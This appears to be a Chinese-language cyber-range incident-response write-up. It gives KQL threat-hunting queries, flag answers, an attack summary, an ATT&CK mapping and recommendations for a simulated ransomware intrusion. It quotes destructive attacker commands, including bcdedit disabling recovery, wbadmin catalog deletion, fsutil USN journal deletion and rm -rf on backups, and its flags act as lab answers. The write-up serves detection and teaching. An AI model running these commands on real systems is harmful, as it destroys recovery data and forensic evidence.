DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vssadmin", "shadowcopy", "resize")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
***FLAG 21:影响 - 恢复禁用***
**目标:** Windows 恢复功能支持在损坏后进行自动系统修复。
**Flag:** `"bcdedit" /set {default} recoveryenabled No`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("bcdedit", "reagentc", "recoveryenabled", "disable")
| where ProcessCommandLine !has "msedgewebview2"
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
***FLAG 22:影响 - 目录删除***
**目标:** 备份目录会跟踪可用的还原点和备份版本。
**Flag:** `"wbadmin" delete catalog -quiet`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("wbadmin", "delete")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
### 阶段 4:持久化
****FLAG 23:持久化 - 注册表自动运行***
**目标:** 注册表键可以在系统启动时自动执行程序。
**Flag:** `WindowsSecurityHealth`
```
DeviceRegistryEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where RegistryKey has @"CurrentVersion\Run"
| where ActionType in ("RegistryValueSet", "RegistryValueModified")
| project TimeGenerated, DeviceName, RegistryKey, RegistryValueName, RegistryValueData
| order by TimeGenerated desc
```
***FLAG 24:持久化 - 计划执行***
**目标:** 计划任务通过可配置的触发器提供可靠的持久化。
**Flag:** `Microsoft\Windows\Security\SecurityHealthService`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has "schtasks"
| where ProcessCommandLine has "/create"
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
### 阶段 5:反取证
***FLAG 25:防御规避 - 日志删除***
**目标:** 文件系统日志会跟踪更改,对取证分析很有价值。
**Flag:** `"fsutil.exe" usn deletejournal /D C:`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("deletejournal")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
### 阶段 6:勒索软件成功
***FLAG 26:影响 - 勒索说明***
**目标:** 勒索说明传达了支付指令,并表明加密成功。
**Flag:** `SILENTLYNX_README.txt`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has_any (".txt")
| project TimeGenerated, DeviceName, FileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
```
## 2. 调查总结
攻击链始于从 `10.1.0.108` 到 `backup-admin@10.1.0.189` 的 SSH 连接,这为攻击者提供了在组织核心 Linux 备份服务器上的立足点。从这里开始,他们进行了有条不紊的侦察 —— 列出 `/backups/`,搜索 `*.tar.gz` 存档,查看 `/etc/passwd` 以获取本地账户,并读取 `/etc/crontab` 以了解备份计划并安排破坏时间以达到最大影响。然后,他们从公共文件共享主机拉取了一个外部存档 (`destroy.7z`),并利用它来支持破坏阶段。一个明文凭据文件 (`/backups/configs/all-credentials.txt`) 被窃取,几乎可以肯定提供了稍后用于 Windows 横向移动的 `kenji.sato` 凭据。然后,攻击者跨每个备份目录执行了全面的 `rm -rf` 命令 —— 存档、每日/每周/每月备份集、数据库备份以及每个主机的工作站/服务器备份 —— 销毁了所有恢复点。为了确保销毁操作在重启后依然生效,他们既停止 (`systemctl stop cron`) 又禁用 (`systemctl disable cron`) 了负责正在进行的备份作业的 cron 服务。
在 Linux 备份基础设施被消除后,攻击者使用 `PsExec64.exe` 和 `kenji.sato` 凭据转向了 Windows 环境,从暂存路径 `C:\Windows\Temp\cache\` 在 `10.1.0.204`(以及其他可能的主机)上远程执行了 `silentlynx.exe`。执行时,SilentLynx 执行了教科书般的加密前恢复擦除:它停止了卷影副本 (`VSS`) 和 Windows 备份引擎 (`wbengine`) 服务,杀死了 `sqlservr.exe` 以释放被锁定的数据库文件,删除了所有现有的卷影副本并将卷影存储限制为 401MB 以防止生成新的副本,通过 `bcdedit` 禁用了 Windows 的自动恢复功能,并通过 `wbadmin` 清除了 Windows Server 备份目录。作为最后一步反取证操作,它使用 `fsutil` 擦除了 NTFS USN 更改日志,移除了调查人员获取文件活动历史记录的关键来源。恶意软件通过注册表 Run 键 (`WindowsSecurityHealth`) 和计划任务 (`Microsoft\Windows\Security\SecurityHealthService`) 建立了持久化 —— 两者都伪装成合法的 Windows 安全组件 —— 随后完成了加密并投放了 `SILENTLYNX_README.txt` 勒索说明。
##3. MITRE ATT&CK 映射
| 战术 | 技术 | 证据 |
| ------------------------------------------ | ------------------------------------------------------------ | ----------------------------------------------- |
| 横向移动 | T1021.004 – Remote Services: SSH | 从 10.1.0.108 到 backup-admin@10.1.0.189 的 SSH |
| 持久化 / 初始访问 | T1078 – Valid Accounts | 使用 backup-admin 和 kenji.sato 凭据 |
| 发现 | T1083 – File and Directory Discovery | ls /backups/, find /backups -name *.tar.gz |
| 发现 | T1087.001 – Account Discovery: Local Account | cat /etc/passwd |
| 发现 | T1053.003 – Scheduled Task/Job: Cron | cat /etc/crontab |
| 命令与控制 / 资源开发 | T1105 – Ingress Tool Transfer | curl 下载 destroy.7z |
| 凭据访问 | T1552.001 – Unsecured Credentials: Credentials In Files | cat /backups/configs/all-credentials.txt |
| 影响 | T1485 – Data Destruction | rm -rf 所有备份目录 |
| 影响 | T1489 – Service Stop | systemctl stop cron, net stop VSS/wbengine, taskkill sqlservr.exe |
| 影响 | T1490 – Inhibit System Recovery | systemctl disable cron, vssadmin delete shadows/resize shadowstorage, bcdedit recoveryenabled No, wbadmin delete catalog|
| 横向移动 | T1570 / T1021.002 – Lateral Tool Transfer / SMB Admin Shares | PsExec64.exe 到 10.1.0.204 |
| 影响 | T1486 – Data Encrypted for Impact | silentlynx.exe 执行, SILENTLYNX_README.txt |
| 防御规避 | T1070.004 – Indicator Removal: File Deletion | fsutil usn deletejournal /D C: |
| 持久化 | T1547.001 – Registry Run Keys / Startup Folder | WindowsSecurityHealth 注册表键 |
| 持久化 | T1053.005 – Scheduled Task | Microsoft\Windows\Security\SecurityHealthService |
## 4. 建议
### 紧急行动
- 将 `10.1.0.108`、`10.1.0.189` 和 `10.1.0.204` 与网络隔离,以阻止进一步的横向移动和破坏。
- 立即禁用/轮换 `backup-admin` 和 `kenji.sato` 凭据 —— 两者均被确认已泄露。
- 阻止发往 `litter.catbox.moe` 及类似文件共享/粘贴站点的出站流量,以切断进一步下载工具的途径。
- 在所有端点上对环境进行扫描,查找 `silentlynx.exe`、`PsExec64.exe`、`WindowsSecurityHealth` 注册表键以及 `Microsoft\Windows\Security\SecurityHealthService` 计划任务。
- 在采取可能覆盖它们的进一步修复步骤之前,识别并清点任何幸存的备份(离线、异地、云端)。
### 短期修复
- 轮换环境中的所有凭据,而不仅仅是已确认泄露的账户。
- 从每个受影响的主机上移除已识别的持久化机制(注册表键、计划任务)。
- 将备份服务器的 SSH 访问限制为小范围的允许列表/堡垒主机,并仅允许基于密钥的身份验证。
- 部署或调整 EDR 告警以监视恢复抑制命令:`vssadmin delete shadows`、`vssadmin resize shadowstorage`、`wbadmin delete catalog`、`bcdedit recoveryenabled No`、`net stop VSS/wbengine`。
- 从干净的镜像重建被加密的主机,并从任何幸存的离线/异地备份中恢复数据。
- 从备份基础设施中移除明文凭据文件(例如 `all-credentials.txt`)。
### 长期修复
- 实施 3-2-1 备份策略,采用生产网络入侵无法触及的不可变、网闸隔离或离线副本。
- 将备份基础设施隔离到其专属的受限网络区域中,与常规的工作站/服务器 VLAN 分开。
- 部署特权访问管理 (PAM) 和机密保险库解决方案,以消除存储的明文凭据。。
- 对所有特权和管理账户强制执行 MFA。
- 针对横向移动工具(PsExec、远程服务创建)和反取证活动(USN 日志删除)建立持续的威胁狩猎 / SOC 监控。
- 定期开展涵盖勒索软件 + 备份破坏场景的 IR 桌面演习。
**报告状态:** 已完成
**下次审查:** 2026 年 1 月 10 日
**分发范围:** Cyber Range标签:PE 加载器, 勒索软件, 安全报告, 库, 应急响应, 数字取证, 自动化脚本